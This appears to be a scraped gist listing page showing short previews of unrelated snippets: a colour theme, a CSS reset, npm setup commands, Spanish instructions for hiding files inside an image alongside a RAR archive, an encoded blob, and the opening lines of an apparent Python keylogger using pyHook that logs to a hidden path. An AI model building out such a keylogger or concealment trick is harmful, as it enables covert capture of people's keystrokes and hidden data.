This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#1A1D21,#000000,#008E91,#FFFFFF,#000000,#FFFFFF,#18DFC1,#DD2A7B,#1A1D21,#FFFFFF |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* http://meyerweb.com/eric/tools/css/reset/ | |
v2.0-modified | 20110126 | |
License: none (public domain) | |
*/ | |
html, body, div, span, applet, object, iframe, | |
h1, h2, h3, h4, h5, h6, p, blockquote, pre, | |
a, abbr, acronym, address, big, cite, code, | |
del, dfn, em, img, ins, kbd, q, s, samp, | |
small, strike, strong, sub, sup, tt, var, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
npm init | |
npm install express --save |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
----------- INSTRUCCIONES ------ | |
1.-Seleccionar una imagen y los archivos que vallamos a ocultar dentro. | |
2.-Crear una carpeta y meter nuestra imagen y archivos dentro de esa | |
carpeta. | |
3.-A la imagen cambiarle el nombre por "1". | |
4.-Crear un archivo.RAR con el nombre "2". | |
5.-Meter los archivos que vallamos a ocultar dentro del winrar llamado "2". | |
6.-Eliminar archivos y solo dejar la imagen "1" y el archivo.RAR "2". |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
A0T2HAAglApmqXQLlHYpgmGQHFPUMlA9U6JppLgmSttIqW8gGEeVzkGwDoQcVEQLUTxEqZqIUukiiY0QfYTQSFCcVGimEm4q2EnFTxVDSbVUST0lpqq6ipKtKBV9BaE0FqVCZ0GoshaE4i1C3EVIe6W/KGUwCJUOA4up6jFIkyF1Wdgsqs8gGo3otFKrQah4rQjNFrktit2ofiMNR7Ac6jlJ0ynXqWI7lb4ryXhFOk9K1iPUfhCqunO/ggYGfIDVfiWmhMA7ODT6FTI2JGl1IFRWG21kHQ0Eb61CUk5xvxIc+Cnq1yqAOPC26FfI2JCk1YFQoXgHN2Cb8grMWY8Qc5yfXFRWG21kHQ0Eb61WgXowDm7vMYo3SHXgFcjggUHqV3AQPAZsU96vULyDG7BNeQXmrEeIOc5PLioWU0NSnAFW0ZU1e8X5ChkbkrQ6s3ZltdFG1oGjULWKTzE6MJQmivsVvw5qwhKV9XrhyywcQTPP3gpkHdSEJSrr9cKXWTiCZp69FVwHNWGJynq98GUWjqCZZ2+tktl8ZwChX9lQytV+BQpScDTA/YoKBSnqoCZ4K9OT52pYHYSK1slzNawObBZVIVB126a88kdfKMiv1WqVnHKrKFMCDlVdAa2KT81oRgc8Uv2KD6AT0ZgScoAOKE0U9yugDmqCF4VCoVCoeUaAoxCWFb8OagIq6/XCl1k4gmaeIWhnK5B1UBNQWa8XvszCETTzDEE7W8F1UBNQWa8XvszCETTzDEE7W6u4IHkCShPF/QqoM1f8OnMFss5cwXXmWiWn3GQTR515rlUy1A2s9itKcllINj0BrcDsgWo+wAN1A1eY83+GqySXNeoAB7fLnP8zXNSdl8uKklwWkm0NNnqgbuDKH32hIP8qyWWNOsDB7TLn/wwLBflXcxGy2pVF5MaeBDZQN3CFOf9nWCjIv0pyWaMOcHC7zPk/w0JB/oV7r0a7gjgM1A1c+aMvFORfJbmsUQc4uN0/+kJB/tXMCBdWU2GoqjIeM8orzPk/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import pyHook, pythoncom, sys, logging | |
import time, datetime | |
wait_seconds = 60 | |
timeout = time.time() + wait_seconds | |
file_log = 'C:\\secret\\dat.txt' | |
def TimeOut(): | |
if time.time() > timeout: | |
return True |